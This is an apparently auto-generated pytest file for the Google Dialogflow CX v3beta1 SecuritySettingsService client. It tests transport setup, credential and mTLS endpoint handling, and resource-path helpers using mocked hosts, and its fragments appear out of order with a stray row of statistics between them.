assert client.transport is transport
def test_transport_get_channel():
# A client may be instantiated with a custom transport instance.
transport = transports.SecuritySettingsServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
channel = transport.grpc_channel
assert channel
transport = transports.SecuritySettingsServiceGrpcAsyncIOTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
channel = transport.grpc_channel
assert channel
@pytest.mark.parametrize("transport_class", [
transports.SecuritySettingsServiceGrpcTransport,
transports.SecuritySettingsServiceGrpcAsyncIOTransport,
])
def test_transport_adc(transport_class):
# Test default credentials are used if not provided.
with mock.patch.object(google.auth, 'default') as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class()
adc.assert_called_once()
def test_transport_grpc_default():
# A client should use the gRPC transport by default.
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
assert isinstance(
client.transport,
transports.SecuritySettingsServiceGrpcTransport,
)
def test_security_settings_service_base_transport_error():
# Passing both a credentials object and credentials_file should raise an error
with pytest.raises(core_exceptions.DuplicateCredentialArgs):
transport = transports.SecuritySettingsServiceTransport(
credentials=ga_credentials.AnonymousCredentials(),
credentials_file="credentials.json"
)
def test_security_settings_service_base_transport():
# Instantiate the base transport.
with mock.patch('google.cloud.dialogflowcx_v3beta1.services.security_settings_service.transports.SecuritySettingsServiceTransport.__init__') as Transport:
Transport.return_value = None
transport = transports.SecuritySettingsServiceTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
# Every method on the transport should just blindly
# raise NotImplementedError.
methods = (
'create_security_settings',
'get_security_settings',
'update_security_settings',
'list_security_settings',
'delete_security_settings',
)
for method in methods:
with pytest.raises(NotImplementedError):
getattr(transport, method)(request=object())
with pytest.raises(NotImplementedError):
transport.close()
@requires_google_auth_gte_1_25_0
def test_security_settings_service_base_transport_with_credentials_file():
# Instantiate the base transport with a credentials file
with mock.patch.object(google.auth, 'load_credentials_from_file', autospec=True) as load_creds, mock.patch('google.cloud.dialogflowcx_v3beta1.services.security_settings_service.transports.SecuritySettingsServiceTransport._prep_wrapped_messages') as Transport:
Transport.return_value = None
load_creds.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.SecuritySettingsServiceTransport(
credentials_file="credentials.json",
quota_project_id="octopus",
)
load_creds.assert_called_once_with("credentials.json",
scopes=None,
default_scopes=(
'https://www.googleapis.com/auth/cloud-platform',
'https://www.googleapis.com/auth/dialogflow',
),
quota_project_id="octopus",
)
@requires_google_auth_lt_1_25_0
def test_security_settings_service_base_transport_with_credentials_file_old_google_auth():
# Instantiate the base transport with a credentials file
with mock.patch.object(google.auth, 'load_credentials_from_file', autospec=True) as load_creds, mock.patch('google.cloud.dialogflowcx_v3beta1.services.security_settings_service.transports.SecuritySettingsServiceTransport._prep_wrapped_messages') as Transport:
Transport.return_value = None
load_creds.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.SecuritySettingsServiceTransport(
credentials_file="credentials.json",
quota_project_id="octopus",
)
load_creds.assert_called_once_with("credentials.json", scopes=(
'https://www.googleapis.com/auth/cloud-platform',
'https://www.googleapis.com/auth/dialogflow',
),
quota_project_id="octopus",
)
def test_security_settings_service_base_transport_with_adc():
# Test the default credentials are used if credentials and credentials_file are None.
with mock.patch.object(google.auth, 'default', autospec=True) as adc, mock.patch('google.cloud.dialogflowcx_v3beta1.services.security_settings_service.transports.SecuritySettingsServiceTransport._prep_wrapped_messages') as Transport:
Transport.return_value = None
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.SecuritySettingsServiceTransport()
adc.assert_called_once()
@requires_google_auth_gte_1_25_0
def test_security_settings_service_auth_adc():
# If no credentials are provided, we should use ADC credentials.
with mock.patch.object(google.auth, 'default', autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
SecuritySettingsServiceClient()
adc.assert_called_once_with(
scopes=None,
default_scopes=(
'https://www.googleapis.com/auth/cloud-platform',
'https://www.googleapis.com/auth/dialogflow',
),
quota_project_id=None,
)
@requires_google_auth_lt_1_25_0
def test_security_settings_service_auth_adc_old_google_auth():
# If no credentials are provided, we should use ADC credentials.
with mock.patch.object(google.auth, 'default', autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
SecuritySettingsServiceClient()
adc.assert_called_once_with(
scopes=( 'https://www.googleapis.com/auth/cloud-platform', 'https://www.googleapis.com/auth/dialogflow',),
quota_project_id=None,
)
@pytest.mark.parametrize(
"transport_class",
[
transports.SecuritySettingsServiceGrpcTransport,
transports.SecuritySettingsServiceGrpcAsyncIOTransport,
],
)
@requires_google_auth_gte_1_25_0
def test_security_settings_service_transport_auth_adc(transport_class):
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(google.auth, 'default', autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class(quota_project_id="octopus", scopes=["1", "2"])
adc.assert_called_once_with(
scopes=["1", "2"],
default_scopes=( 'https://www.googleapis.com/auth/cloud-platform', 'https://www.googleapis.com/auth/dialogflow',),
quota_project_id="octopus",
)
@pytest.mark.parametrize(
"transport_class",
[
transports.SecuritySettingsServiceGrpcTransport,
transports.SecuritySettingsServiceGrpcAsyncIOTransport,
],
)
@requires_google_auth_lt_1_25_0
def test_security_settings_service_transport_auth_adc_old_google_auth(transport_class):
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(google.auth, "default", autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class(quota_project_id="octopus")
adc.assert_called_once_with(scopes=(
'https://www.googleapis.com/auth/cloud-platform',
'https://www.googleapis.com/auth/dialogflow',
),
quota_project_id="octopus",
)
@pytest.mark.parametrize(
"transport_class,grpc_helpers",
[
(transports.SecuritySettingsServiceGrpcTransport, grpc_helpers),
(transports.SecuritySettingsServiceGrpcAsyncIOTransport, grpc_helpers_async)
],
)
def test_security_settings_service_transport_create_channel(transport_class, grpc_helpers):
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(google.auth, "default", autospec=True) as adc, mock.patch.object(
grpc_helpers, "create_channel", autospec=True
) as create_channel:
creds = ga_credentials.AnonymousCredentials()
adc.return_value = (creds, None)
transport_class(
quota_project_id="octopus",
scopes=["1", "2"]
)
create_channel.assert_called_with(
"dialogflow.googleapis.com:443",
credentials=creds,
credentials_file=None,
quota_project_id="octopus",
default_scopes=(
'https://www.googleapis.com/auth/cloud-platform',
'https://www.googleapis.com/auth/dialogflow',
),
scopes=["1", "2"],
default_host="dialogflow.googleapis.com",
ssl_credentials=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
@pytest.mark.parametrize("transport_class", [transports.SecuritySettingsServiceGrpcTransport, transports.SecuritySettingsServiceGrpcAsyncIOTransport])
def test_security_settings_service_grpc_transport_client_cert_source_for_mtls(
transport_class
):
cred = ga_credentials.AnonymousCredentials()
# Check ssl_channel_credentials is used if provided.
with mock.patch.object(transport_class, "create_channel") as mock_create_channel:
mock_ssl_channel_creds = mock.Mock()
transport_class(
host="squid.clam.whelk",
credentials=cred,
ssl_channel_credentials=mock_ssl_channel_creds
)
mock_create_channel.assert_called_once_with(
"squid.clam.whelk:443",
credentials=cred,
credentials_file=None,
scopes=None,
ssl_credentials=mock_ssl_channel_creds,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
# Check if ssl_channel_credentials is not provided, then client_cert_source_for_mtls
# is used.
with mock.patch.object(transport_class, "create_channel", return_value=mock.Mock()):
with mock.patch("grpc.ssl_channel_credentials") as mock_ssl_cred:
transport_class(
credentials=cred,
client_cert_source_for_mtls=client_cert_source_callback
)
expected_cert, expected_key = client_cert_source_callback()
mock_ssl_cred.assert_called_once_with(
certificate_chain=expected_cert,
private_key=expected_key
)
def test_security_settings_service_host_no_port():
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(api_endpoint='dialogflow.googleapis.com'),
)
assert client.transport._host == 'dialogflow.googleapis.com:443'
def test_security_settings_service_host_with_port():
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(api_endpoint='dialogflow.googleapis.com:8000'),
)
assert client.transport._host == 'dialogflow.googleapis.com:8000'
def test_security_settings_service_grpc_transport_channel():
channel = grpc.secure_channel('http://localhost/', grpc.local_channel_credentials())
# Check that channel is used if provided.
transport = transports.SecuritySettingsServiceGrpcTransport(
host="squid.clam.whelk",
channel=channel,
)
assert transport.grpc_channel == channel
assert transport._host == "squid.clam.whelk:443"
assert transport._ssl_channel_credentials == None
def test_security_settings_service_grpc_asyncio_transport_channel():
channel = aio.secure_channel('http://localhost/', grpc.local_channel_credentials())
# Check that channel is used if provided.
transport = transports.SecuritySettingsServiceGrpcAsyncIOTransport(
host="squid.clam.whelk",
channel=channel,
)
assert transport.grpc_channel == channel
assert transport._host == "squid.clam.whelk:443"
assert transport._ssl_channel_credentials == None
# Remove this test when deprecated arguments (api_mtls_endpoint, client_cert_source) are
# removed from grpc/grpc_asyncio transport constructor.
@pytest.mark.parametrize("transport_class", [transports.SecuritySettingsServiceGrpcTransport, transports.SecuritySettingsServiceGrpcAsyncIOTransport])
def test_security_settings_service_transport_channel_mtls_with_client_cert_source(
transport_class
):
with mock.patch("grpc.ssl_channel_credentials", autospec=True) as grpc_ssl_channel_cred:
with mock.patch.object(transport_class, "create_channel") as grpc_create_channel:
mock_ssl_cred = mock.Mock()
grpc_ssl_channel_cred.return_value = mock_ssl_cred
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
cred = ga_credentials.AnonymousCredentials()
with pytest.warns(DeprecationWarning):
with mock.patch.object(google.auth, 'default') as adc:
adc.return_value = (cred, None)
transport = transport_class(
host="squid.clam.whelk",
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=client_cert_source_callback,
)
adc.assert_called_once()
grpc_ssl_channel_cred.assert_called_once_with(
certificate_chain=b"cert bytes", private_key=b"key bytes"
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=cred,
credentials_file=None,
scopes=None,
ssl_credentials=mock_ssl_cred,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
assert transport.grpc_channel == mock_grpc_channel
assert transport._ssl_channel_credentials == mock_ssl_cred
# Remove this test when deprecated arguments (api_mtls_endpoint, client_cert_source) are
# removed from grpc/grpc_asyncio transport constructor.
@pytest.mark.parametrize("transport_class", [transports.SecuritySettingsServiceGrpcTransport, transports.SecuritySettingsServiceGrpcAsyncIOTransport])
def test_security_settings_service_transport_channel_mtls_with_adc(
transport_class
):
mock_ssl_cred = mock.Mock()
with mock.patch.multiple(
"google.auth.transport.grpc.SslCredentials",
__init__=mock.Mock(return_value=None),
ssl_credentials=mock.PropertyMock(return_value=mock_ssl_cred),
):
with mock.patch.object(transport_class, "create_channel") as grpc_create_channel:
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
mock_cred = mock.Mock()
with pytest.warns(DeprecationWarning):
transport = transport_class(
host="squid.clam.whelk",
credentials=mock_cred,
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=None,
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=mock_cred,
credentials_file=None,
scopes=None,
ssl_credentials=mock_ssl_cred,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
assert transport.grpc_channel == mock_grpc_channel
def test_deidentify_template_path():
organization = "squid"
location = "clam"
deidentify_template = "whelk"
expected = "organizations/{organization}/locations/{location}/deidentifyTemplates/{deidentify_template}".format(organization=organization, location=location, deidentify_template=deidentify_template, )
actual = SecuritySettingsServiceClient.deidentify_template_path(organization, location, deidentify_template)
assert expected == actual
def test_parse_deidentify_template_path():
expected = {
"organization": "octopus",
"location": "oyster",
"deidentify_template": "nudibranch",
}
path = SecuritySettingsServiceClient.deidentify_template_path(**expected)
# Check that the path construction is reversible.
actual = SecuritySettingsServiceClient.parse_deidentify_template_path(path)
assert expected == actual
def test_inspect_template_path():
organization = "cuttlefish"
location = "mussel"
inspect_template = "winkle"
expected = "organizations/{organization}/locations/{location}/inspectTemplates/{inspect_template}".format(organization=organization, location=location, inspect_template=inspect_template, )
actual = SecuritySettingsServiceClient.inspect_template_path(organization, location, inspect_template)
assert expected == actual
def test_parse_inspect_template_path():
expected = {
"organization": "nautilus",
"location": "scallop",
"inspect_template": "abalone",
}
path = SecuritySettingsServiceClient.inspect_template_path(**expected)
# Check that the path construction is reversible.
actual = SecuritySettingsServiceClient.parse_inspect_template_path(path)
assert expected == actual
def test_security_settings_path():
project = "squid"
location = "clam"
security_settings = "whelk"
expected = "projects/{project}/locations/{location}/securitySettings/{security_settings}".format(project=project, location=location, security_settings=security_settings, )
actual = SecuritySettingsServiceClient.security_settings_path(project, location, security_settings)
assert expected == actual
def test_parse_security_settings_path():
expected = {
"project": "octopus",
"location": "oyster",
"security_settings": "nudibranch",
}
path = SecuritySettingsServiceClient.security_settings_path(**expected)
# Check that the path construction is reversible.
actual = SecuritySettingsServiceClient.parse_security_settings_path(path)
assert expected == actual
def test_common_billing_account_path():
billing_account = "cuttlefish"
expected = "billingAccounts/{billing_account}".format(billing_account=billing_account, )
actual = SecuritySettingsServiceClient.common_billing_account_path(billing_account)
assert expected == actual
def test_parse_common_billing_account_path():
expected = {
"billing_account": "mussel",
}
path = SecuritySettingsServiceClient.common_billing_account_path(**expected)
# Check that the path construction is reversible.
actual = SecuritySettingsServiceClient.parse_common_billing_account_path(path)
assert expected == actual
def test_common_folder_path():
folder = "winkle"
expected = "folders/{folder}".format(folder=folder, )
actual = SecuritySettingsServiceClient.common_folder_path(folder)
assert expected == actual
def test_parse_common_folder_path():
expected = {
"folder": "nautilus",
}
path = SecuritySettingsServiceClient.common_folder_path(**expected)
# Check that the path construction is reversible.
actual = SecuritySettingsServiceClient.parse_common_folder_path(path)
assert expected == actual
def test_common_organization_path():
organization = "scallop"
expected = "organizations/{organization}".format(organization=organization, )
actual = SecuritySettingsServiceClient.common_organization_path(organization)
assert expected == actual
def test_parse_common_organization_path():
expected = {
"organization": "abalone",
}
path = SecuritySettingsServiceClient.common_organization_path(**expected)
# Check that the path construction is reversible.
actual = SecuritySettingsServiceClient.parse_common_organization_path(path)
assert expected == actual
def test_common_project_path():
project = "squid"
expected = "projects/{project}".format(project=project, )
actual = SecuritySettingsServiceClient.common_project_path(project)
assert expected == actual
def test_parse_common_project_path():
expected = {
"project": "clam",
}
path = SecuritySettingsServiceClient.common_project_path(**expected)
# Check that the path construction is reversible.
actual = SecuritySettingsServiceClient.parse_common_project_path(path)
assert expected == actual
def test_common_location_path():
project = "whelk"
location = "octopus"
expected = "projects/{project}/locations/{location}".format(project=project, location=location, )
actual = SecuritySettingsServiceClient.common_location_path(project, location)
assert expected == actual
def test_parse_common_location_path():
expected = {
"project": "oyster",
"location": "nudibranch",
}
path = SecuritySettingsServiceClient.common_location_path(**expected)
# Check that the path construction is reversible.
actual = SecuritySettingsServiceClient.parse_common_location_path(path)
assert expected == actual
def test_client_withDEFAULT_CLIENT_INFO():
client_info = gapic_v1.client_info.ClientInfo()
with mock.patch.object(transports.SecuritySettingsServiceTransport, '_prep_wrapped_messages') as prep:
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
client_info=client_info,
)
prep.assert_called_once_with(client_info)
with mock.patch.object(transports.SecuritySettingsServiceTransport, '_prep_wrapped_messages') as prep:
transport_class = SecuritySettingsServiceClient.get_transport_class()
transport = transport_class(
credentials=ga_credentials.AnonymousCredentials(),
client_info=client_info,
)
prep.assert_called_once_with(client_info)
@pytest.mark.asyncio
async def test_transport_close_async():
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc_asyncio",
)
with mock.patch.object(type(getattr(client.transport, "grpc_channel")), "close") as close:
async with client:
close.assert_not_called()
close.assert_called_once()
def test_transport_close():
transports = {
"grpc": "_grpc_channel",
}
for transport, close_name in transports.items():
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport
)
with mock.patch.object(type(getattr(client.transport, close_name)), "close") as close:
with client:
close.assert_not_called()
close.assert_called_once()
def test_client_ctx():
transports = [
'grpc',
]
for transport in transports:
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport
)
# Test client calls underlying transport.
with mock.patch.object(type(client.transport), "close") as close:
close.assert_not_called()
with client:
pass
close.assert_called()
| 41.890606 | 263 | 0.706317 |
import os
import mock
import packaging.version
import grpc
from grpc.experimental import aio
import math
import pytest
from proto.marshal.rules.dates import DurationRule, TimestampRule
from google.api_core import client_options
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import grpc_helpers
from google.api_core import grpc_helpers_async
from google.api_core import path_template
from google.auth import credentials as ga_credentials
from google.auth.exceptions import MutualTLSChannelError
from google.cloud.dialogflowcx_v3beta1.services.security_settings_service import SecuritySettingsServiceAsyncClient
from google.cloud.dialogflowcx_v3beta1.services.security_settings_service import SecuritySettingsServiceClient
from google.cloud.dialogflowcx_v3beta1.services.security_settings_service import pagers
from google.cloud.dialogflowcx_v3beta1.services.security_settings_service import transports
from google.cloud.dialogflowcx_v3beta1.services.security_settings_service.transports.base import _GOOGLE_AUTH_VERSION
from google.cloud.dialogflowcx_v3beta1.types import security_settings
from google.cloud.dialogflowcx_v3beta1.types import security_settings as gcdc_security_settings
from google.oauth2 import service_account
from google.protobuf import field_mask_pb2
import google.auth
requires_google_auth_lt_1_25_0 = pytest.mark.skipif(
packaging.version.parse(_GOOGLE_AUTH_VERSION) >= packaging.version.parse("1.25.0"),
reason="This test requires google-auth < 1.25.0",
)
requires_google_auth_gte_1_25_0 = pytest.mark.skipif(
packaging.version.parse(_GOOGLE_AUTH_VERSION) < packaging.version.parse("1.25.0"),
reason="This test requires google-auth >= 1.25.0",
)
def client_cert_source_callback():
return b"cert bytes", b"key bytes"
def modify_default_endpoint(client):
return "foo.googleapis.com" if ("localhost" in client.DEFAULT_ENDPOINT) else client.DEFAULT_ENDPOINT
def test__get_default_mtls_endpoint():
api_endpoint = "example.googleapis.com"
api_mtls_endpoint = "example.mtls.googleapis.com"
sandbox_endpoint = "example.sandbox.googleapis.com"
sandbox_mtls_endpoint = "example.mtls.sandbox.googleapis.com"
non_googleapi = "api.example.com"
assert SecuritySettingsServiceClient._get_default_mtls_endpoint(None) is None
assert SecuritySettingsServiceClient._get_default_mtls_endpoint(api_endpoint) == api_mtls_endpoint
assert SecuritySettingsServiceClient._get_default_mtls_endpoint(api_mtls_endpoint) == api_mtls_endpoint
assert SecuritySettingsServiceClient._get_default_mtls_endpoint(sandbox_endpoint) == sandbox_mtls_endpoint
assert SecuritySettingsServiceClient._get_default_mtls_endpoint(sandbox_mtls_endpoint) == sandbox_mtls_endpoint
assert SecuritySettingsServiceClient._get_default_mtls_endpoint(non_googleapi) == non_googleapi
@pytest.mark.parametrize("client_class", [
SecuritySettingsServiceClient,
SecuritySettingsServiceAsyncClient,
])
def test_security_settings_service_client_from_service_account_info(client_class):
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(service_account.Credentials, 'from_service_account_info') as factory:
factory.return_value = creds
info = {"valid": True}
client = client_class.from_service_account_info(info)
assert client.transport._credentials == creds
assert isinstance(client, client_class)
assert client.transport._host == 'dialogflow.googleapis.com:443'
@pytest.mark.parametrize("transport_class,transport_name", [
(transports.SecuritySettingsServiceGrpcTransport, "grpc"),
(transports.SecuritySettingsServiceGrpcAsyncIOTransport, "grpc_asyncio"),
])
def test_security_settings_service_client_service_account_always_use_jwt(transport_class, transport_name):
with mock.patch.object(service_account.Credentials, 'with_always_use_jwt_access', create=True) as use_jwt:
creds = service_account.Credentials(None, None, None)
transport = transport_class(credentials=creds, always_use_jwt_access=True)
use_jwt.assert_called_once_with(True)
with mock.patch.object(service_account.Credentials, 'with_always_use_jwt_access', create=True) as use_jwt:
creds = service_account.Credentials(None, None, None)
transport = transport_class(credentials=creds, always_use_jwt_access=False)
use_jwt.assert_not_called()
@pytest.mark.parametrize("client_class", [
SecuritySettingsServiceClient,
SecuritySettingsServiceAsyncClient,
])
def test_security_settings_service_client_from_service_account_file(client_class):
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(service_account.Credentials, 'from_service_account_file') as factory:
factory.return_value = creds
client = client_class.from_service_account_file("dummy/file/path.json")
assert client.transport._credentials == creds
assert isinstance(client, client_class)
client = client_class.from_service_account_json("dummy/file/path.json")
assert client.transport._credentials == creds
assert isinstance(client, client_class)
assert client.transport._host == 'dialogflow.googleapis.com:443'
def test_security_settings_service_client_get_transport_class():
transport = SecuritySettingsServiceClient.get_transport_class()
available_transports = [
transports.SecuritySettingsServiceGrpcTransport,
]
assert transport in available_transports
transport = SecuritySettingsServiceClient.get_transport_class("grpc")
assert transport == transports.SecuritySettingsServiceGrpcTransport
@pytest.mark.parametrize("client_class,transport_class,transport_name", [
(SecuritySettingsServiceClient, transports.SecuritySettingsServiceGrpcTransport, "grpc"),
(SecuritySettingsServiceAsyncClient, transports.SecuritySettingsServiceGrpcAsyncIOTransport, "grpc_asyncio"),
])
@mock.patch.object(SecuritySettingsServiceClient, "DEFAULT_ENDPOINT", modify_default_endpoint(SecuritySettingsServiceClient))
@mock.patch.object(SecuritySettingsServiceAsyncClient, "DEFAULT_ENDPOINT", modify_default_endpoint(SecuritySettingsServiceAsyncClient))
def test_security_settings_service_client_client_options(client_class, transport_class, transport_name):
with mock.patch.object(SecuritySettingsServiceClient, 'get_transport_class') as gtc:
transport = transport_class(
credentials=ga_credentials.AnonymousCredentials()
)
client = client_class(transport=transport)
gtc.assert_not_called()
# Check that if channel is provided via str we will create a new one.
with mock.patch.object(SecuritySettingsServiceClient, 'get_transport_class') as gtc:
client = client_class(transport=transport_name)
gtc.assert_called()
# Check the case api_endpoint is provided.
options = client_options.ClientOptions(api_endpoint="squid.clam.whelk")
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host="squid.clam.whelk",
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "never".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "never"}):
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "always".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "always"}):
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_MTLS_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT has
# unsupported value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "Unsupported"}):
with pytest.raises(MutualTLSChannelError):
client = client_class()
# Check the case GOOGLE_API_USE_CLIENT_CERTIFICATE has unsupported value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "Unsupported"}):
with pytest.raises(ValueError):
client = client_class()
# Check the case quota_project_id is provided
options = client_options.ClientOptions(quota_project_id="octopus")
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id="octopus",
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize("client_class,transport_class,transport_name,use_client_cert_env", [
(SecuritySettingsServiceClient, transports.SecuritySettingsServiceGrpcTransport, "grpc", "true"),
(SecuritySettingsServiceAsyncClient, transports.SecuritySettingsServiceGrpcAsyncIOTransport, "grpc_asyncio", "true"),
(SecuritySettingsServiceClient, transports.SecuritySettingsServiceGrpcTransport, "grpc", "false"),
(SecuritySettingsServiceAsyncClient, transports.SecuritySettingsServiceGrpcAsyncIOTransport, "grpc_asyncio", "false"),
])
@mock.patch.object(SecuritySettingsServiceClient, "DEFAULT_ENDPOINT", modify_default_endpoint(SecuritySettingsServiceClient))
@mock.patch.object(SecuritySettingsServiceAsyncClient, "DEFAULT_ENDPOINT", modify_default_endpoint(SecuritySettingsServiceAsyncClient))
@mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "auto"})
def test_security_settings_service_client_mtls_env_auto(client_class, transport_class, transport_name, use_client_cert_env):
# This tests the endpoint autoswitch behavior. Endpoint is autoswitched to the default
# mtls endpoint, if GOOGLE_API_USE_CLIENT_CERTIFICATE is "true" and client cert exists.
# Check the case client_cert_source is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}):
options = client_options.ClientOptions(client_cert_source=client_cert_source_callback)
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class(client_options=options)
if use_client_cert_env == "false":
expected_client_cert_source = None
expected_host = client.DEFAULT_ENDPOINT
else:
expected_client_cert_source = client_cert_source_callback
expected_host = client.DEFAULT_MTLS_ENDPOINT
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=expected_host,
scopes=None,
client_cert_source_for_mtls=expected_client_cert_source,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case ADC client cert is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}):
with mock.patch.object(transport_class, '__init__') as patched:
with mock.patch('google.auth.transport.mtls.has_default_client_cert_source', return_value=True):
with mock.patch('google.auth.transport.mtls.default_client_cert_source', return_value=client_cert_source_callback):
if use_client_cert_env == "false":
expected_host = client.DEFAULT_ENDPOINT
expected_client_cert_source = None
else:
expected_host = client.DEFAULT_MTLS_ENDPOINT
expected_client_cert_source = client_cert_source_callback
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=expected_host,
scopes=None,
client_cert_source_for_mtls=expected_client_cert_source,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case client_cert_source and ADC client cert are not provided.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}):
with mock.patch.object(transport_class, '__init__') as patched:
with mock.patch("google.auth.transport.mtls.has_default_client_cert_source", return_value=False):
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize("client_class,transport_class,transport_name", [
(SecuritySettingsServiceClient, transports.SecuritySettingsServiceGrpcTransport, "grpc"),
(SecuritySettingsServiceAsyncClient, transports.SecuritySettingsServiceGrpcAsyncIOTransport, "grpc_asyncio"),
])
def test_security_settings_service_client_client_options_scopes(client_class, transport_class, transport_name):
# Check the case scopes are provided.
options = client_options.ClientOptions(
scopes=["1", "2"],
)
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=["1", "2"],
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize("client_class,transport_class,transport_name", [
(SecuritySettingsServiceClient, transports.SecuritySettingsServiceGrpcTransport, "grpc"),
(SecuritySettingsServiceAsyncClient, transports.SecuritySettingsServiceGrpcAsyncIOTransport, "grpc_asyncio"),
])
def test_security_settings_service_client_client_options_credentials_file(client_class, transport_class, transport_name):
# Check the case credentials file is provided.
options = client_options.ClientOptions(
credentials_file="credentials.json"
)
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file="credentials.json",
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
def test_security_settings_service_client_client_options_from_dict():
with mock.patch('google.cloud.dialogflowcx_v3beta1.services.security_settings_service.transports.SecuritySettingsServiceGrpcTransport.__init__') as grpc_transport:
grpc_transport.return_value = None
client = SecuritySettingsServiceClient(
client_options={'api_endpoint': 'squid.clam.whelk'}
)
grpc_transport.assert_called_once_with(
credentials=None,
